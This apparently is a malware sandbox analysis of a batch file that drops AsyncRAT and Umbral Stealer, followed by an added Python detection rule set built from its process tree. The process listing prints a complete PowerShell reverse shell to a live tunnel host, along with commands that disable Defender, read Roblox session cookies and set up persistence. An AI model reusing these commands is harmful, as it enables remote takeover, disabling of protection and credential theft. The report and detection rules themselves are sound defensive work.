Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-11-2024 12:17

General

  • Target

    reverse shell.bat

  • Size

    953B

  • MD5

    a34e9091b3cb1b1fddb64dd1e6eafe8b

  • SHA1

    73a9ce1190dbf81871d72cc98b7d81487bad17dc

  • SHA256

    b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803

  • SHA512

    65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral Stealer is an open-source modular information stealer written in C#.

  • Umbral family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Uses powershell.exe to run commands.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses wmic.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\reverse shell.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3116
      • C:\Users\Admin\Desktop\output.exe
        "C:\Users\Admin\Desktop\output.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1692
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\Desktop\output.exe"
          4⤵
          • Views/modifies file attributes
          PID:3660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\output.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:3216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1172
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          PID:2564
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          PID:4616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:1828
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          4⤵
          • Detects videocard installed
          PID:2164
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\output.exe" && pause
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:3284
          • C:\Windows\system32\PING.EXE
            ping localhost
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3844
      • C:\Users\Admin\Desktop\Loader.exe
        "C:\Users\Admin\Desktop\Loader.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3192
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:400
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:4692
          • C:\Users\Admin\AppData\Roaming\WINDOWS.exe
            "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
            5⤵
            • Executes dropped EXE
            PID:1608
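
The signature labels above are the sandbox's summary; what a detection engineer actually keys on is the command lines in this process tree: the PowerShell TCP reverse shell to a ply.gg tunnel, the Set-MpPreference/Add-MpPreference Defender tampering, attrib +h +s on the dropped binary, the ping-then-del self-delete, the onlogon scheduled task with /rl highest pointing into AppData, and binaries launched from Desktop/AppData by a script host. The following is an added example, not code from the report or from the AsyncRAT or Umbral projects: a small Python rule set replayed over the recorded tree. The SAMPLE records are transcribed from the Processes section (long command lines shortened, parent PIDs inferred from the tree and the root given ppid 0); the rule names, the Proc type and the regexes are my own assumptions, tuned to the spellings seen here.

```python
"""Detection rules replayed over the process tree recorded above.

Added example, not code from the sandbox report or from either malware family.
SAMPLE is transcribed from the Processes section (long command lines shortened,
parent PIDs inferred from the tree); rule names and the Proc type are my own.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# (rule name, image pattern, command-line pattern); all matched case-insensitively.
RULES = [
    ("powershell_tcp_reverse_shell", r"powershell",
     r"Net\.Sockets\.TCPClient.*(Invoke-Expression|\bIEX\b)"),
    ("defender_protection_disabled", r"powershell",
     r"Set-MpPreference.*(-Disable\w+\s+\$true|-MAPSReporting\s+Disabled|-SubmitSamplesConsent\s+(NeverSend|2)\b)"),
    ("defender_exclusion_added", r"powershell", r"Add-MpPreference\s+-ExclusionPath"),
    ("file_hidden_with_attrib", r"attrib", r"\+h\b.*\+s\b|\+s\b.*\+h\b"),
    ("ping_then_self_delete", r"cmd", r"\bping\b.*&&\s*del\b"),
    ("schtasks_onlogon_userdir", r"schtasks|cmd",
     r"schtasks\s+/create.*/sc\s+onlogon.*/tr\s+\S*\\(AppData|Temp|ProgramData)\\"),
    ("batch_run_from_temp", r"cmd", r'/c\s+"*[^"]*\\AppData\\Local\\Temp\\[^"]*\.bat'),
    ("roblox_cookie_read", r"powershell", r"\.ROBLOSECURITY"),
    ("hardware_survey_wmic", r"wmic", r"csproduct\s+get\s+uuid|win32_VideoController|totalphysicalmemory"),
]


def scan(procs):
    """Return [(proc, [rule names])] for each process that trips at least one rule.

    Windows reuses PIDs (the report itself lists 1608 twice), so real telemetry
    should key parent lookups on a process GUID; PIDs are enough for this sample.
    """
    by_pid = {p.pid: p for p in procs}
    results = []
    for p in procs:
        names = [name for name, img, cmd in RULES
                 if re.search(img, p.image, re.I) and re.search(cmd, p.cmdline, re.I)]
        # Persistence that also asks for the highest run level deserves its own flag.
        if "schtasks_onlogon_userdir" in names and re.search(r"/rl\s+highest", p.cmdline, re.I):
            names.append("schtasks_highest_runlevel")
        # Drop-and-run: an .exe under a user-writable path started by a script host.
        parent = by_pid.get(p.ppid)
        if (parent and re.search(r"powershell|cmd\.exe", parent.image, re.I)
                and re.search(r"\\Users\\[^\\]+\\(Desktop|AppData)\\.*\.exe$", p.image, re.I)):
            names.append("dropped_exe_from_script_host")
        if names:
            results.append((p, names))
    return results


def triggered_rules(procs):
    """Distinct rule names across the tree, for a one-line triage summary."""
    return sorted({n for _, names in scan(procs) for n in names})


def lineage(procs, pid):
    """Parent chain from the root down to pid, to show how a process was reached."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid and pid not in chain:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain[::-1]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"
CMD = r"C:\Windows\system32\cmd.exe"
SAMPLE = [  # constructed from the report's tree; the root cmd.exe is given ppid 0
    Proc(4560, 0, CMD, r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\reverse shell.bat"'),
    Proc(3116, 4560, PS, r'''powershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); ... $Output = try { Invoke-Expression ($Code) } catch { $_ }; ..."'''),
    Proc(1644, 3116, r"C:\Users\Admin\Desktop\output.exe", r'"C:\Users\Admin\Desktop\output.exe"'),
    Proc(1692, 1644, WMIC, r'"wmic.exe" csproduct get uuid'),
    Proc(3660, 1644, r"C:\Windows\SYSTEM32\attrib.exe", r'"attrib.exe" +h +s "C:\Users\Admin\Desktop\output.exe"'),
    Proc(1608, 1644, PS, r'"powershell.exe" Add-MpPreference -ExclusionPath ' r"'C:\Users\Admin\Desktop\output.exe'"),
    Proc(2408, 1644, PS, r'"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
                         r'-DisableRealtimeMonitoring $true -MAPSReporting Disabled -SubmitSamplesConsent NeverSend'),
    Proc(3216, 1644, PS, r'"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'),
    Proc(2164, 1644, WMIC, r'"wmic" path win32_VideoController get name'),
    Proc(3284, 1644, CMD, r'"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\output.exe" && pause'),
    Proc(3844, 3284, r"C:\Windows\system32\PING.EXE", r"ping localhost"),
    Proc(1624, 3116, r"C:\Users\Admin\Desktop\Loader.exe", r'"C:\Users\Admin\Desktop\Loader.exe"'),
    Proc(3192, 1624, CMD, r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit'''),
    Proc(400, 3192, r"C:\Windows\system32\schtasks.exe", r"""schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'"""),
    Proc(2800, 1624, CMD, r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat""'),
    Proc(4692, 2800, r"C:\Windows\system32\timeout.exe", r"timeout 3"),
    Proc(1608, 2800, r"C:\Users\Admin\AppData\Roaming\WINDOWS.exe", r'"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'),
]

if __name__ == "__main__":
    for proc, names in scan(SAMPLE):
        print(proc.pid, names)
    print("ping.exe reached via", lineage(SAMPLE, 3844))
    print(triggered_rules(SAMPLE))
```

Two design notes. The rules deliberately match on the child's own command line and image, so each of the Defender, attrib, schtasks and ping-and-delete behaviours is caught even if the dropper changes; only the drop-and-run rule needs the parent, which is why the sample carries parent PIDs. The hardware survey rule (csproduct uuid, VideoController, total memory) is low severity on its own and is there for correlation: on this tree it fires from the same parent as the Defender tampering, which is what turns a noisy WMI query into a stealer profiling stage.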

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2984662ba3f86d7fcf26758b5b76754d

        SHA1

        bc2a43ffd898222ee84406313f3834f226928379

        SHA256

        f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde

        SHA512

        a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        985b3105d8889886d6fd953575c54e08

        SHA1

        0f9a041240a344d82bac0a180520e7982c15f3cd

        SHA256

        5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

        SHA512

        0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulvc0h03.zap.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat

        Filesize

        151B

        MD5

        59d271b5196305a5d0f1a5de6da135f6

        SHA1

        d9cc0613b4227c53122c298449aac2ce52b34f83

        SHA256

        7396230cb1fb7ba5a08951509f00919ee51be82f7ae20ef8a2df2c52a03b4578

        SHA512

        66c4c9773152aca642c14fc9d8936fe89a4bcf929d1f3fd6f84eda3a7fe1663f8f7d3b65b7f30bbf6b667ee65b4ae271cc82667be5bfde250615470cbf96ecc5

      • C:\Users\Admin\Desktop\Loader.exe

        Filesize

        63KB

        MD5

        7ceb11ebb7a55e33a82bc3b66f554e79

        SHA1

        8dfd574ad06ded662d92d81b72f14c1914ac45b5

        SHA256

        aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

        SHA512

        d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

      • C:\Users\Admin\Desktop\output.exe

        Filesize

        227KB

        MD5

        96fc8b45a92d736087ac43746a142cf4

        SHA1

        35999912f4405f21f5068841581d1e1babf55a4b

        SHA256

        408dca374549b037529ff6b200f1fd3a9105d3f531805213e8750d3f3463ab1a

        SHA512

        b6938308458eab4412d130c1c0f5b5104f1e98ab714f659ee27d8d033dbbf9608c98f592bedcb6ff51f0f8f6a7fd4f6705783e0fbcdc900d743a8bf6416aaa16

      • memory/1624-48-0x0000000000CD0000-0x0000000000CE6000-memory.dmp

        Filesize

        88KB

      • memory/1644-119-0x000001EC36920000-0x000001EC36932000-memory.dmp

        Filesize

        72KB

      • memory/1644-32-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/1644-33-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/1644-147-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/1644-140-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/1644-139-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/1644-118-0x000001EC368F0000-0x000001EC368FA000-memory.dmp

        Filesize

        40KB

      • memory/1644-74-0x000001EC4F120000-0x000001EC4F196000-memory.dmp

        Filesize

        472KB

      • memory/1644-75-0x000001EC4F1A0000-0x000001EC4F1F0000-memory.dmp

        Filesize

        320KB

      • memory/1644-76-0x000001EC368B0000-0x000001EC368CE000-memory.dmp

        Filesize

        120KB

      • memory/1644-31-0x000001EC34B30000-0x000001EC34B70000-memory.dmp

        Filesize

        256KB

      • memory/3116-14-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/3116-10-0x0000016BF19A0000-0x0000016BF19C2000-memory.dmp

        Filesize

        136KB

      • memory/3116-12-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/3116-13-0x00007FFB25BC3000-0x00007FFB25BC5000-memory.dmp

        Filesize

        8KB

      • memory/3116-126-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/3116-11-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/3116-15-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

      • memory/3116-0-0x00007FFB25BC3000-0x00007FFB25BC5000-memory.dmp

        Filesize

        8KB

      • memory/3116-16-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB